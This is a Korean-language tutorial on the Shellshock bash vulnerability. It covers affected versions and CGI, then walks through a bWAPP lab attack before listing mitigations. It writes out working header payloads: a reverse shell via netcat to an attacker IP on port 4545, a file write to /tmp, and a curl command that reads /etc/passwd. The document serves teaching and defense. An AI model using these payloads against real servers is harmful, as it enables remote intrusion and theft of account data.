ShellShock(CVE-2014-6271) 취약점

개요

2014년 9월 유닉스(UNIX) 운영체제의 Bash Shell에서 발생한 취약점입니다. 같은 해에 OpenSSL의 문제로 발생한 Heartbleed 보다 파급효과가 더욱 컸던 사건이었습니다.

 

쉘 쇼크의 경우 UNIX 이외에도 MAC OSX, Android, OpenBSD, DHCP Client, CGI를 사용하는 웹서버 등 해당 운영체제에 취약한 Bash Shell을 사용하는 모든 운영체제에서 발생하였으며 무엇보다 원격으로 코드를 실행하여 root 권한을 획득하거나 대상 서버에 직접 명령을 내리는 방법도 가능했습니다.

 

취약한 버전

GNU Bash 4.3을 포함하여 이전 모두 bash-3.0-27.el4.2

bash-3.2-32.el5_9.2
bash-3.2-32.el5_9.1
bash-3.2-24.el5_6.1
bash-3.2-33.el5_11.1.sjis.1
bash-3.2-33.el5.1
bash-4.1.2-15.el6_4.1
bash-4.1.2-9.el6_2.1
bash-4.1.2-15.el6_5.1.sjis.1
bash-4.1.2-15.el6_5.1
bash-4.2.45-5.el7_0.2

 

CGI(Common Gateway Interface) 이란

웹 서버와 일반 프로그램을 연계하기 위해 만들어진 규약으로 현재는 서버 측 언어인 asp, jsp, php 가 활성화되면서 사용하는 곳은 극히 드물게 되었습니다.

 

이는 특수하게 조작된 환경변수를 삽입하게 되면 대상 서버에서는 bash 환경변수 내에 하달받은 명령어를 실행시키게 되는 방식입니다.

<!-- 취약한 bash 버전인지 확인 -->
env x='() { :;}; echo vulnerable' bash -c "echo test"

안전한 버전

취약한 버전

취약점이 패치된 버전과 그렇지 않은 버전을 확인해본 결과 echo 출력이 조금 틀립니다.

 

ShellShock 는 환경변수(env)를 선언하는 과정에서 발생하는데 환경변수(var=) 다음에 함수 선언 () {return; }; 을 해야 하는 게 정상이지만 공격자가 임의적으로 삽입한 시스템 명령어( /bin/id )까지 실행될경우 큰 문제가 발생할 수 있습니다.

 

포트번호 " 4545 " 를 열어두고 대상 서버와 커넥션 하기 위해 오픈해둡니다.

 

웹 프록시 도구를 통해 잡아준 후 Referer 헤더를 공격자 서버에 셀 명령어를 사용하는 공격코드를 입력해야 합니다.

최신 리눅스 환경에서는 -e 옵션( 상호 간에 Connection 되었을 경우 file을 exec 시킴 )이 공격에 악용될 수 있어서 제한하고 있습니다.

 

Referer 헤더 값에 시스템 명령어를 삽입
() { :;}; echo "Vulnerable bWAPP:" $(/bin/sh -c "nc 192.168.0.20 4545 -e /bin/bash")

공격에 성공할 경우 4545 포트를 열고 기다리고 있는 공격자에게 세션을 맺게 된다.

 

대기 중인 터미널로 돌아가 확인해보면 성공적으로 대상 서버와 Connection 되어 원하는 시스템 명령어를 사용하여 다양한 정보를 획득하고 추가적인 Post Exploit을 시도할 수가 있습니다.

 

User-Agent 헤더를 하단의 내용으로 수정
() { :;}; echo bashtest>/tmp/guleum

CGI 환경의 웹서버를 대상으로 Shell Shock을 시도하기 위해 User-Agent 헤더를 수정하여 대상 서버의 임시디렉토리(tmp) 에 원하는 파일을 업로드할 수 있습니다.

 

상위의 명령을 통해 대상 임시 디렉터리에 파일이 생성된 것을 확인할 수 있습니다.

 

로컬 권한 일지라도 쉘 쇼크 취약점을 통해 대상 서버에 웹쉘을 업로드하고 접근하여 다양한 권한에 접근하는 것이 가능해질 수 있습니다.

 

<!-- curl 을 통해 파일 열람 -->
curl -v -A "() { :;}; echo;/bin/cat /etc/passwd" http://192.168.0.131//bWAPP/cgi-bin/shellshock.sh

-v : 자세히 출력
-A : User-Agent 사용

curl( Client URL )을 사용하여 확인해 볼 수도 있습니다. /bin/cat /etc/passwd를 통해 대상 서버에 존재하는 사용자 계정 정보들을 확인할 수 있습니다.

 

/etc/shadow 파일까지 접근을 하고 싶다면 시스템에 존재하는 취약점을 추가적으로 이용하여 로컬 권한을 상승시켜야 합니다.

---

대응 방안

비슷한 시기에 발생했던 Heartbleed 취약점 보다 악용하는 방법도 매우 쉽고 얻을 수 있는 정보가 매우 많기 때문에 그때 당시 보안시장에서 큰 이슈였습니다.

현재는 거의 발견되는 취약점이 아니지만 만약 가상 터미널 환경인 Telnet이나 ssh를 차단하여 원격을 막는다 하더라도 취약점을 이용해 CGI 스크립트를 사용한다면 공격에 노출될 가능성이 높습니다.

 

또한 Router, 가전제품, 무선 액세스 포인트 같은 임베디드 장치의 경우에도 대부부 리눅스 기반으로 동작하고 정기적인 패치를 하는 것이 좋습니다.

만일 이런 임베디드 장비들이 침해될 경우에는 공격자는 원격지에서 원하는 대로 조작하고 논리적인 방식으로 기기를 오작동시킬 수 있습니다.

 

(1) 최신 bash 버전으로 업데이트 
apt-get install bash 
yum -y update bash 

(2) IDS 나 IPS를 통해 http 헤더 값에 () , { 같은 문자열이 포함되어 있는지 탐지 및 확인

 

(3) 사용하지 않는 CGI 스크립트는 비활성화